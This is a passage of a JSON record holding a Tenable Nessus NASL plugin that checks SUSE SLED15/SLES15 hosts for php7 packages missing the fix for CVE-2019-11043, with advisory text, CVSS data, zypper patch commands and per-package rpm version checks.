"p-cpe:/a:novell:suse_linux:php7-soap", "p-cpe:/a:novell:suse_linux:php7-soap-debuginfo", "p-cpe:/a:novell:suse_linux:php7-sockets", "p-cpe:/a:novell:suse_linux:php7-sockets-debuginfo", "p-cpe:/a:novell:suse_linux:php7-sodium", "p-cpe:/a:novell:suse_linux:php7-sodium-debuginfo", "p-cpe:/a:novell:suse_linux:php7-sqlite", "p-cpe:/a:novell:suse_linux:php7-sqlite-debuginfo", "p-cpe:/a:novell:suse_linux:php7-sysvmsg", "p-cpe:/a:novell:suse_linux:php7-sysvmsg-debuginfo", "p-cpe:/a:novell:suse_linux:php7-sysvsem", "p-cpe:/a:novell:suse_linux:php7-sysvsem-debuginfo", "p-cpe:/a:novell:suse_linux:php7-sysvshm", "p-cpe:/a:novell:suse_linux:php7-sysvshm-debuginfo", "p-cpe:/a:novell:suse_linux:php7-tidy", "p-cpe:/a:novell:suse_linux:php7-tidy-debuginfo", "p-cpe:/a:novell:suse_linux:php7-tokenizer", "p-cpe:/a:novell:suse_linux:php7-tokenizer-debuginfo", "p-cpe:/a:novell:suse_linux:php7-wddx", "p-cpe:/a:novell:suse_linux:php7-wddx-debuginfo", "p-cpe:/a:novell:suse_linux:php7-xmlreader", "p-cpe:/a:novell:suse_linux:php7-xmlreader-debuginfo", "p-cpe:/a:novell:suse_linux:php7-xmlrpc", "p-cpe:/a:novell:suse_linux:php7-xmlrpc-debuginfo", "p-cpe:/a:novell:suse_linux:php7-xmlwriter", "p-cpe:/a:novell:suse_linux:php7-xmlwriter-debuginfo", "p-cpe:/a:novell:suse_linux:php7-xsl", "p-cpe:/a:novell:suse_linux:php7-xsl-debuginfo", "p-cpe:/a:novell:suse_linux:php7-zip", "p-cpe:/a:novell:suse_linux:php7-zip-debuginfo", "p-cpe:/a:novell:suse_linux:php7-zlib", "p-cpe:/a:novell:suse_linux:php7-zlib-debuginfo", "cpe:/o:novell:suse_linux:15"], "id": "SUSE_SU-2019-2819-1.NASL", "href": "https://www.tenable.com/plugins/nessus/130421", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2019:2819-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(130421);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/04/25\");\n\n script_cve_id(\"CVE-2019-11043\");\n script_xref(name:\"IAVA\", value:\"2019-A-0399-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/04/15\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2019-0695\");\n\n script_name(english:\"SUSE SLED15 / SLES15 Security Update : php7 (SUSE-SU-2019:2819-1)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote SUSE host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"This update for php7 fixes the following issues :\n\nSecurity issue fixed :\n\nCVE-2019-11043: Fixed possible remote code execution via env_path_info\nunderflow in fpm_main.c (bsc#1154999).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/show_bug.cgi?id=1154999\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2019-11043/\");\n # https://www.suse.com/support/update/announcement/2019/suse-su-20192819-1/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?8234baae\");\n script_set_attribute(attribute:\"solution\", value:\n\"To install this SUSE Security Update use the SUSE recommended\ninstallation methods like YaST online_update or 'zypper patch'.\n\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Module for Web Scripting 15-SP1:zypper in -t\npatch SUSE-SLE-Module-Web-Scripting-15-SP1-2019-2819=1\n\nSUSE Linux Enterprise Module for Web Scripting 15:zypper in -t patch\nSUSE-SLE-Module-Web-Scripting-15-2019-2819=1\n\nSUSE Linux Enterprise Module for Packagehub Subpackages 15:zypper in\n-t patch SUSE-SLE-Module-Packagehub-Subpackages-15-2019-2819=1\n\nSUSE Linux Enterprise Module for Open Buildservice Development Tools\n15-SP1:zypper in -t patch\nSUSE-SLE-Module-Development-Tools-OBS-15-SP1-2019-2819=1\n\nSUSE Linux Enterprise Module for Open Buildservice Development Tools\n15:zypper in -t patch\nSUSE-SLE-Module-Development-Tools-OBS-15-2019-2819=1\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-11043\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'PHP-FPM Underflow RCE');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/10/28\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/10/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/10/31\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:apache2-mod_php7\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:apache2-mod_php7-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-bcmath\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-bcmath-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-bz2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-bz2-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-calendar\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-calendar-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-ctype\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-ctype-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-curl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-curl-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-dba\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-dba-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-dom\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-dom-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-embed\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-embed-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-enchant\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-enchant-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-exif\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-exif-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-fastcgi\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-fastcgi-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-fileinfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-fileinfo-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-fpm\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-fpm-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-ftp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-ftp-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-gd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-gd-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-gettext\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-gettext-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-gmp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-gmp-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-iconv\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-iconv-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-intl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-intl-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-json\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-json-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-ldap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-ldap-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-mbstring\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-mbstring-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-mysql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-mysql-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-odbc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-odbc-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-opcache\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-opcache-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-openssl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-openssl-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-pcntl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-pcntl-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-pdo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-pdo-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-pgsql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-pgsql-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-phar\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-phar-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-posix\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-posix-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-readline\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-readline-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-shmop\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-shmop-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-snmp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-snmp-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-soap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-soap-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-sockets\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-sockets-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-sodium\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-sodium-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-sqlite\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-sqlite-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-sysvmsg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-sysvmsg-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-sysvsem\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-sysvsem-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-sysvshm\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-sysvshm-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-tidy\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-tidy-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-tokenizer\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-tokenizer-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-wddx\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-wddx-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-xmlreader\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-xmlreader-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-xmlrpc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-xmlrpc-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-xmlwriter\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-xmlwriter-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-xsl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-xsl-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-zip\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-zip-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-zlib\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-zlib-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:15\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"SuSE Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2019-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLED15|SLES15)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLED15 / SLES15\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES15\" && (! preg(pattern:\"^(0|1)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES15 SP0/1\", os_ver + \" SP\" + sp);\nif (os_ver == \"SLED15\" && (! preg(pattern:\"^(0|1)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLED15 SP0/1\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"apache2-mod_php7-7.2.5-4.46.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"apache2-mod_php7-debuginfo-7.2.5-4.46.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"php7-7.2.5-4.46.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"php7-bcmath-7.2.5-4.46.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"php7-bcmath-debuginfo-7.2.5-4.46.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"php7-bz2-7.2.5-4.46.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"php7-bz2-debuginfo-7.2.5-4.46.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"php7-calendar-7.2.5-4.46.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"php7-calendar-debuginfo-7.2.5-4.46.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"php7-ctype-7.2.5-4.46.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"php7-ctype-debuginfo-7.2.5-4.46.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"php7-curl-7.2.5-4.46.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"php7-curl-debuginfo-7.2.5-4.46.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"php7-dba-7.2.5-4.46.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"php7-dba-debuginfo-7.2.5-4.46.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"php7-debuginfo-7.2.5-4.46.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"php7-debugsource-7.2.5-4.46.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"php7-devel-7.2.5-4.46.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"php7-dom-7.2.5-4.46.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"php7-dom-debuginfo-7.2.5-4.46.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"php7-embed-7.2.5-4.46.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"php7-embed-debuginfo-7.2.5-4.46.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"php7-enchant-7.2.5-4.46.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"php7-enchant-debuginfo-7.2.5-4.46.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"php7-exif-7.2.5-4.46.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"php7-exif-debuginfo-7.2.5-4.46.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"php7-fastcgi-7.2.5-4.46.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"php7-fastcgi-debuginfo-7.2.5-4.46.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"php7-fileinfo-7.2.5-4.46.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"php7-fileinfo-debuginfo-7.2.5-4.46.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"php7-fpm-7.2.5-4.46.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"php7-fpm-debuginfo-7.2.5-4.46.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"php7-ftp-7.2.5-4.46.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"php7-ftp-debuginfo-7.2.5-4.46.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"php7-gd-7.2.5-4.46.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"php7-gd-debuginfo-7.2.5-4.46.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"php7-gettext-7.2.5-4.46.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"php7-gettext-debuginfo-7.2.5-4.46.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"php7-gmp-7.2.5-4.46.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"php7-gmp-debuginfo-7.2.5-4.46.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"php7-iconv-7.2.5-4.46.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"php7-iconv-debuginfo-7.2.5-4.46.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"php7-intl-7.2.5-4.46.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"php7-intl-debuginfo-7.2.5-4.46.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"php7-json-7.2.5-4.46.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"php7-json-debuginfo-7.2.5-4.46.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"php7-ldap-7.2.5-4.46.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"php7-ldap-debuginfo-7.2.5-4.46.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"php7-mbstring-7.2.5-4.46.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"php7-mbstring-debuginfo-7.2.5-4.46.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"php7-mysql-7.2.5-4.46.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"php7-mysql-debuginfo-7.2.5-4.46.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"php7-odbc-7.2.5-4.46.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"php7-odbc-debuginfo-7.2.5-4.46.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"php7-opcache-7.2.5-4.46.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"php7-opcache-debuginfo-7.2.5-4.46.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"php7-openssl-7.2.5-4.46.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"php7-openssl-debuginfo-7.2.5-4.46.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"php7-pcntl-7.2.5-4.46.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"php7-pcntl-debuginfo-7.2.5-4.46.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"php7-pdo-7.2.5-4.46.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"php7-pdo-debuginfo-7.2.5-4.46.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"php7-pgsql-7.2.5-4.46.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"php7-pgsql-debuginfo-7.2.5-4.46.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"php7-phar-7.2.5-4.46.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"php7-phar-debuginfo-7.2.5-4.46.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"php7-posix-7.2.5-4.46.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"php7-posix-debuginfo-7.2.5-4.46.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"php7-readline-7.2.5-4.46.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"php7-readline-debuginfo-7.2.5-4.46.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"php7-shmop-7.2.5-4.46.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"php7-shmop-debuginfo-7.2.5-4.46.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"php7-snmp-7.2.5-4.46.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"php7-snmp-debuginfo-7.2.5-4.46.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"php7-soap-7.2.5-4.46.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"php7-soap-debuginfo-7.2.5-4.46.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"php7-sockets-7.2.5-4.46.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"php7-sockets-debuginfo-7.2.5-4.46.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"php7-sodium-7.2.5-4.46.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"php7-sodium-debuginfo-7.2.5-4.46.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"php7-sqlite-7.2.5-4.46.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"php7-sqlite-debuginfo-7.2.5-4.46.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"php7-sysvmsg-7.2.5-4.46.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"php7-sysvmsg-debuginfo-7.2.5-4.46.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"php7-sysvsem-7.2.5-4.46.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", 